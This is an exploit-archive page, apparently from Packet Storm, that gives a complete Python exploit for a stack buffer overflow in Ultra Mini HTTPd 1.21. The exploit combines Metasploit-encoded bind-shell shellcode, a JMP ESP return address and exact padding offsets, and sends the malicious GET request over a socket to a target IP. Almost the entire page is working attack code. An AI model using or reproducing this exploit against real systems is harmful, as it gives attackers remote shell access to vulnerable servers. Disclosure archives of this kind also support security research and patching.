Ultra Mini HTTPd 1.21 Buffer Overflow

[Matt]

Description : Ultra Mini HTTPd version 1.21 suffers from a stack buffer overflow vulnerability. This exploit binds a shell.

Author : superkojiman

Source : Ultra Mini HTTPd 1.21 Buffer Overflow ? Packet Storm

Code :

# Exploit Title: Ultra Mini HTTPD stack buffer overflow
# Date: 10 July 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: http://www.picolix.jp/
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.21
# Tested on: Windows XP Professional SP2, English
#
# Description:
# A buffer overflow is triggered when requesting a very long
# resource name.
#

import socket
import struct

# msfpayload windows/shell_bind_tcp R | \
#     msfencode -b "\x00\x0a\x0d\x20\x0b\x09\x0c"
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shellcode = (
"\xba\x1f\xb5\xae\xa1\xdd\xc4\xd9\x74\x24\xf4\x5e\x33\xc9" +
"\xb1\x56\x31\x56\x13\x83\xc6\x04\x03\x56\x10\x57\x5b\x5d" +
"\xc6\x1e\xa4\x9e\x16\x41\x2c\x7b\x27\x53\x4a\x0f\x15\x63" +
"\x18\x5d\x95\x08\x4c\x76\x2e\x7c\x59\x79\x87\xcb\xbf\xb4" +
"\x18\xfa\x7f\x1a\xda\x9c\x03\x61\x0e\x7f\x3d\xaa\x43\x7e" +
"\x7a\xd7\xab\xd2\xd3\x93\x19\xc3\x50\xe1\xa1\xe2\xb6\x6d" +
"\x99\x9c\xb3\xb2\x6d\x17\xbd\xe2\xdd\x2c\xf5\x1a\x56\x6a" +
"\x26\x1a\xbb\x68\x1a\x55\xb0\x5b\xe8\x64\x10\x92\x11\x57" +
"\x5c\x79\x2c\x57\x51\x83\x68\x50\x89\xf6\x82\xa2\x34\x01" +
"\x51\xd8\xe2\x84\x44\x7a\x61\x3e\xad\x7a\xa6\xd9\x26\x70" +
"\x03\xad\x61\x95\x92\x62\x1a\xa1\x1f\x85\xcd\x23\x5b\xa2" +
"\xc9\x68\x38\xcb\x48\xd5\xef\xf4\x8b\xb1\x50\x51\xc7\x50" +
"\x85\xe3\x8a\x3c\x6a\xde\x34\xbd\xe4\x69\x46\x8f\xab\xc1" +
"\xc0\xa3\x24\xcc\x17\xc3\x1f\xa8\x88\x3a\x9f\xc9\x81\xf8" +
"\xcb\x99\xb9\x29\x73\x72\x3a\xd5\xa6\xd5\x6a\x79\x18\x96" +
"\xda\x39\xc8\x7e\x31\xb6\x37\x9e\x3a\x1c\x4e\x98\xf4\x44" +
"\x03\x4f\xf5\x7a\xb2\xd3\x70\x9c\xde\xfb\xd4\x36\x76\x3e" +
"\x03\x8f\xe1\x41\x61\xa3\xba\xd5\x3d\xad\x7c\xd9\xbd\xfb" +
"\x2f\x76\x15\x6c\xbb\x94\xa2\x8d\xbc\xb0\x82\xc4\x85\x53" +
"\x58\xb9\x44\xc5\x5d\x90\x3e\x66\xcf\x7f\xbe\xe1\xec\xd7" +
"\xe9\xa6\xc3\x21\x7f\x5b\x7d\x98\x9d\xa6\x1b\xe3\x25\x7d" +
"\xd8\xea\xa4\xf0\x64\xc9\xb6\xcc\x65\x55\xe2\x80\x33\x03" +
"\x5c\x67\xea\xe5\x36\x31\x41\xac\xde\xc4\xa9\x6f\x98\xc8" +
"\xe7\x19\x44\x78\x5e\x5c\x7b\xb5\x36\x68\x04\xab\xa6\x97" +
"\xdf\x6f\xd6\xdd\x7d\xd9\x7f\xb8\x14\x5b\xe2\x3b\xc3\x98" +
"\x1b\xb8\xe1\x60\xd8\xa0\x80\x65\xa4\x66\x79\x14\xb5\x02" +
"\x7d\x8b\xb6\x06"
)

# 7C941EED  , JMP ESP , ntdll.dll
payload =  "A" * 5392 + struct.pack("<I", 0x7C941EED)
payload += "\x81\xc4\xf0\xea\xff\xff" + shellcode + "B" * 4230

print "[+] sending payload, length", len(payload)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.37.175", 80))

buf = (
    "GET /" + payload + " HTTP/1.1\r\n" +
    "Host: 192.168.37.175" +
    "\r\n\r\n"
)

s.send(buf)
s.close()